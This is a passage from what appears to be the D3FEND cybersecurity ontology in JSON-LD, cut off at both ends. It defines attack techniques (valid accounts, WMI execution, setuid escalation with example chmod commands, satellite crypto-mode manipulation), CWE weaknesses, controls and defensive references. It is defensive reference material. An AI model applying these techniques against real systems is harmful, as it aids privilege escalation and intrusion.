      "d3f:kb-article": "## How it works\nUsage of decoy session tokens may be monitored to track attacker behavior or otherwise control the beliefs of the attacker.\n\n## Considerations\n* Interaction and activity with the decoy session token must be constantly monitored and analyzed to detect unauthorized activity.\n* Session tokens are typically short-lived and therefore the decoy must be continuously updated to provide the appearance of it being used in the production environment.\n* Automated tools can assist with maintenance and updates by automatically adjusting the decoy session token and environment to mimic the production environment.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:SessionToken"
      },
      "rdfs:label": "Decoy Session Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Nd4cbf2877c4b47bea7bec59609261366"
        }
      ]
    },
    {
      "@id": "_:Nd4cbf2877c4b47bea7bec59609261366",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionToken"
      }
    },
    {
      "@id": "d3f:CWE-1234",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1234",
      "d3f:definition": "System configuration protection may be bypassed during debug mode.",
      "rdfs:label": "Hardware Internal or Debug Modes Allow Override of Locks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:GetOpenSockets",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enumerates": {
        "@id": "d3f:Pipe"
      },
      "rdfs:label": "Get Open Sockets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N4980b68798b740549111b6f02bc62a1b"
        }
      ]
    },
    {
      "@id": "_:N4980b68798b740549111b6f02bc62a1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:restricted-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restricted-by y: The entity x is limited, constrained, or regulated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:restricts"
      },
      "rdfs:label": "restricted-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1078",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078",
      "d3f:definition": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.",
      "d3f:produces": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:uses": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Valid Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N89b595d1f7aa4cd0863cd25d3bb8515f"
        },
        {
          "@id": "_:Nf0a4e71cc72549399fcc8c5da1e4ec95"
        },
        {
          "@id": "_:N4cd32021f7f847018f518a6acbda8b9a"
        }
      ]
    },
    {
      "@id": "_:N89b595d1f7aa4cd0863cd25d3bb8515f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nf0a4e71cc72549399fcc8c5da1e4ec95",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:N4cd32021f7f847018f518a6acbda8b9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1129",
      "@type": "owl:Class",
      "d3f:attack-id": "T1129",
      "d3f:definition": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).",
      "rdfs:label": "Shared Modules",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:DE-0003.07",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.07",
      "d3f:definition": "Many missions separate authentication from confidentiality and allow on-orbit selection of algorithms, keys, profiles, or “crypto off/clear” states. Adversaries manipulate these mode controls and selectors to desynchronize ground and space or to hide content: flipping to a profile that the ground is not using, requesting clear telemetry while maintaining authenticated uplink, or rotating key IDs so frames validate internally but appear undecodable to external tools. Mode indicators and status words can also be biased so ground displays show expected settings while the link actually operates under attacker-chosen parameters, masking command and data exchanges within normal-looking traffic.",
      "rdfs:label": "Cryptographic Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "Cryptographic Modes"
    },
    {
      "@id": "d3f:WebApplicationServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web application server is a web server that hosts applications. Application server frameworks are software frameworks for building application servers. An application server framework provides both facilities to create web applications and a server environment to run them. In the case of Java application servers, the server behaves like an extended virtual machine for running applications, transparently handling connections to the database on one side, and, often, connections to the Web client on the other.",
      "d3f:runs": {
        "@id": "d3f:WebApplication"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Application_server"
      },
      "rdfs:label": "Web Application Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WebServer"
        },
        {
          "@id": "_:N63472e8de4aa432696a58a10aea81903"
        }
      ]
    },
    {
      "@id": "_:N63472e8de4aa432696a58a10aea81903",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebApplication"
      }
    },
    {
      "@id": "d3f:Database",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DatabaseRecord"
      },
      "d3f:definition": "A database is an organized collection of data, generally stored and accessed electronically from a computer system. Where databases are more complex they are often developed using formal design and modeling techniques.",
      "d3f:may-contain": {
        "@id": "d3f:StoredProcedure"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Database"
      },
      "rdfs:label": "Database",
      "rdfs:seeAlso": {
        "@id": "dbr:Database"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Naf73dbe1a7a140a88a3aa72c5543a2a2"
        },
        {
          "@id": "_:N116f8e126e0a484c8ba2a69d522d8093"
        }
      ]
    },
    {
      "@id": "_:Naf73dbe1a7a140a88a3aa72c5543a2a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseRecord"
      }
    },
    {
      "@id": "_:N116f8e126e0a484c8ba2a69d522d8093",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StoredProcedure"
      }
    },
    {
      "@id": "d3f:T1047",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1047",
      "d3f:definition": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Windows Management Instrumentation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N064ce05822da47f88927ab5dfe9581e9"
        },
        {
          "@id": "_:Nfe587432305149a4806807fd451893d1"
        }
      ]
    },
    {
      "@id": "_:N064ce05822da47f88927ab5dfe9581e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:Nfe587432305149a4806807fd451893d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:ProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a proxy server is a server application or appliance that acts as an intermediary for requests from clients seeking resources from servers that provide those resources. A proxy server thus functions on behalf of the client when requesting service, potentially masking the true origin of the request to the resource server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Proxy_server"
      },
      "rdfs:label": "Proxy Server",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_proxy"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "d3f:Server"
        }
      ]
    },
    {
      "@id": "rdfs:label",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:Reference-SecretsManagementCheatSheet-OWASP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html"
      },
      "d3f:kb-abstract": "The OWASP Secrets Management Cheat Sheet provides clear directives for securely managing sensitive data like API keys and credentials. It emphasizes centralized control for storage, provisioning, and auditing to prevent unauthorized access. Adopting strong rotation and management protocols is essential for maintaining security and integrity in DevOps environments.",
      "d3f:kb-author": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialScrubbing"
      },
      "d3f:kb-reference-title": "Secrets Management Cheat Sheet",
      "rdfs:label": "Secrets Management Cheat Sheet"
    },
    {
      "@id": "d3f:T1458",
      "@type": "owl:Class",
      "d3f:attack-id": "T1458",
      "d3f:definition": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include:",
      "rdfs:label": "Replication Through Removable Media - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Replication Through Removable Media"
    },
    {
      "@id": "d3f:T1166",
      "@type": "owl:Class",
      "d3f:attack-id": "T1166",
      "d3f:definition": "When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.001",
      "rdfs:label": "Setuid and Setgid",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Separation of System and User Functionality | Interfaces for Non-privileged Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "SC-2(1)"
    },
    {
      "@id": "d3f:CWE-134",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-134",
      "d3f:definition": "The product uses a function that accepts a format string as an argument, but the format string originates from an external source.",
      "rdfs:label": "Use of Externally-Controlled Format String",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.TA0014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0014",
      "d3f:definition": "The adversary is trying to communicate with compromised AI systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.",
      "rdfs:label": "Command and Control - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0014"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:CCI-002347_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAccessPatternAnalysis"
        },
        {
          "@id": "d3f:InputDeviceAnalysis"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs organization-defined data mining detection techniques for organization-defined data storage objects to adequately detect data mining attempts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002347"
    },
    {
      "@id": "d3f:WebIdentityToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An ID token is an artifact that proves that the user has been authenticated.",
      "d3f:kb-article": "## How it works\n\nAn ID token is proof of the user's authentication. An ID token is encoded as a JSON Web Token (JWT), a standard format that allows your application to easily inspect its content, and make sure it comes from the expected issuer and that no one else changed it.",
      "d3f:signed-by": {
        "@id": "d3f:CryptographicKey"
      },
      "d3f:synonym": "Identity Token",
      "rdfs:isDefinedBy": {
        "@id": "https://auth0.com/blog/id-token-access-token-what-is-the-difference/"
      },
      "rdfs:label": "Web Identity Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Credential"
        },
        {
          "@id": "_:N5b20d50a63654d8b8831c935e6d946c4"
        }
      ]
    },
    {
      "@id": "_:N5b20d50a63654d8b8831c935e6d946c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:signed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:Reference-ThreatDetectionForReturnOrientedProgramming_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140075556A1"
      },
      "d3f:kb-abstract": "This disclosure describes, in part, techniques for detecting security exploits associated with return-oriented programming. The techniques include determining that a retrieved count is indicative of malicious activity, such as return oriented programming. The count may be retrieved from a processor performance counter of prediction mismatches, the prediction mismatches resulting from comparisons of a call stack of a computing device and of a shadow call stack maintained by a processor of the computing device. The techniques further include performing at least one security response action in response to determining that the count indicates malicious activity.",
      "d3f:kb-author": "Georg WICHERSKI",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting shellcode security exploits. A call stack of a computing device is compared with a shadow call stack maintained by a processor of the computing device since a return oriented program may only be able to control or spoof the call stack and not the shadow call stack. Mismatches between the two are counted and if the number of mismatches exceeds a certain threshold it is an indication of malicious activity and a security response action is performed.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ShadowStackComparisons"
      },
      "d3f:kb-reference-title": "Threat detection for return oriented programming",
      "rdfs:label": "Reference - Threat detection for return oriented programming - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T0833",
      "@type": "owl:Class",
      "d3f:attack-id": "T0833",
      "d3f:definition": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Control Logic - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        },
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        }
      ],
      "skos:prefLabel": "Modify Control Logic"
    },
    {
      "@id": "d3f:Reference-RDPConnectionDetection_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-002"
      },
      "d3f:kb-abstract": "The Remote Desktop Protocol (RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to laterally move to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "CAR-2013-07-002: RDP Connection Detection",
      "rdfs:label": "Reference - CAR-2013-07-002: RDP Connection Detection - MITRE"
    },
    {
      "@id": "d3f:Enclave",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Network enclaves consist of standalone assets that do not interact with other information systems or networks. A major difference between a DMZ or demilitarized zone and a network enclave is a DMZ allows inbound and outbound traffic access, where firewall boundaries are traversed. In an enclave, firewall boundaries are not traversed. Enclave protection tools can be used to provide protection within specific security domains. These mechanisms are installed as part of an Intranet to connect networks that have similar security requirements.",
      "d3f:may-contain": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_enclave"
      },
      "rdfs:label": "Enclave",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N0dc526ec91974c4fa057cb5f6fae4ea9"
        }
      ],
      "skos:altLabel": "Network Enclave"
    },
    {
      "@id": "_:N0dc526ec91974c4fa057cb5f6fae4ea9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:FileSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        },
        {
          "@id": "d3f:FileSystemMetadata"
        }
      ],
      "d3f:definition": "In computing, a file system or filesystem is used to control how data is stored and retrieved. Without a file system, information placed in a storage medium would be one large body of data with no way to tell where one piece of information stops and the next begins. By separating the data into pieces and giving each piece a name, the information is easily isolated and identified. Taking its name from the way paper-based information systems are named, each group of data is called a \"file\". The structure and logic rules used to manage the groups of information and their names is called a \"file system\".",
      "rdfs:isDefinedBy": {
        "@id": "dbr:File_system"
      },
      "rdfs:label": "File System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N751f45b804304be59486ebaf0940761b"
        },
        {
          "@id": "_:N5e1807f8768c4bc39653a708eed4d2af"
        },
        {
          "@id": "_:N9077a1a99e1448f295b3f66a35174edf"
        },
        {
          "@id": "_:N1fd2204546634bce9e522645f099a6d0"
        }
      ]
    },
    {
      "@id": "_:N751f45b804304be59486ebaf0940761b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:N5e1807f8768c4bc39653a708eed4d2af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N9077a1a99e1448f295b3f66a35174edf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "_:N1fd2204546634bce9e522645f099a6d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:NISTControl",
      "@type": "owl:Class",
      "rdfs:label": "NIST Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControl"
        },
        {
          "@id": "_:Nde3edb7fbd2e4b9295475b708c6f9379"
        }
      ]
    },
    {
      "@id": "_:Nde3edb7fbd2e4b9295475b708c6f9379",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NISTSP800-53ControlCatalog"
      }
    },
    {
      "@id": "d3f:OTWriteCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Write or store data.",
      "rdfs:comment": [
        "BACnet: atomicWriteFile\nBACnet: addListElement\nBACnet: removeListElement\nBACnet: createObject\nBACnet: deleteObject\nBACnet: writeProperty\nBACnet: writePropertyMultiple\nBACnet: write-group ",
        "CIP: Set Attributes All\nCIP: Set Attribute List\nCIP: Set Attribute Single\nCIP: Set Member\nCIP: Insert Member\nCIP: Remove Member ",
        "GE-SRTP: WRITE SYSTEM MEMORY\nGE-SRTP: WRITE TASK MEMORY ",
        "Modbus: Write Single Coil\nModbus: Write Single Register\nModbus: Write Multiple Coils\nModbus: Write Multiple Registers\nModbus: Write File Record\nModbus: Mask Write Register\nModbus: Read Write Register"
      ],
      "rdfs:label": "OT Write Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:OTModifyControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that adds, removes, or changes, process data on a remote device.",
      "rdfs:label": "OT Modify Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:Ne3c71f0b8deb496c97cc252924580800"
        },
        {
          "@id": "_:N08f1531efb6844c6a5595f5d69d02562"
        }
      ]
    },
    {
      "@id": "_:Ne3c71f0b8deb496c97cc252924580800",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N08f1531efb6844c6a5595f5d69d02562",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyControlProgramCommand"
      }
    },
    {
      "@id": "d3f:CWE-332",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-332",
      "d3f:definition": "The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.",
      "rdfs:label": "Insufficient Entropy in PRNG",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-331"
      }
    },
    {
      "@id": "d3f:CWE-95",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-95",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \"eval\").",
      "rdfs:label": "Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:CWE-1257",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1257",
      "d3f:definition": "Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.",
      "rdfs:label": "Improper Access Control Applied to Mirrored or Aliased Memory Regions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:WindowsCreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a thread to execute within the virtual address space of the calling process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateThread"
        },
        {
          "@id": "d3f:WindowsNtCreateThreadEx"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread"
      },
      "rdfs:label": "Windows CreateThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateThread"
        },
        {
          "@id": "_:N75734a8d310b4526aa2e566f623d8757"
        },
        {
          "@id": "_:N806e656cd8e3480da848aae02cb3497a"
        }
      ]
    },
    {
      "@id": "_:N75734a8d310b4526aa2e566f623d8757",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThread"
      }
    },
    {
      "@id": "_:N806e656cd8e3480da848aae02cb3497a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      }
    },
    {
      "@id": "d3f:T1546",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)",
      "rdfs:label": "Event Triggered Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SystemConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the services, parameters, and initial settings for an operating system.",
      "rdfs:label": "System Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        }
      ]
    },
    {
      "@id": "d3f:CWE-177",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-177",
      "d3f:definition": "The product does not properly handle when all or part of an input has been URL encoded.",
      "rdfs:label": "Improper Handling of URL Encoding (Hex Encoding)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:FileSection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file section is one of the portions of a file in which the file is regarded as divided and where together the file sections constitute the whole file.",
      "rdfs:label": "File Section",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05876035-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "File Part"
    },
    {
      "@id": "d3f:RDPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Remote Desktop Protocol (RDP), a communication protocol developed by Microsoft that facilitates secure remote access to graphical interfaces on desktops or applications hosted on remote servers. RDP supports multi-channel communication for transferring input, output, and management commands.",
      "rdfs:label": "RDP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/rdp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "_:N13f7f8b2d11542319909992da79d27a1"
        },
        {
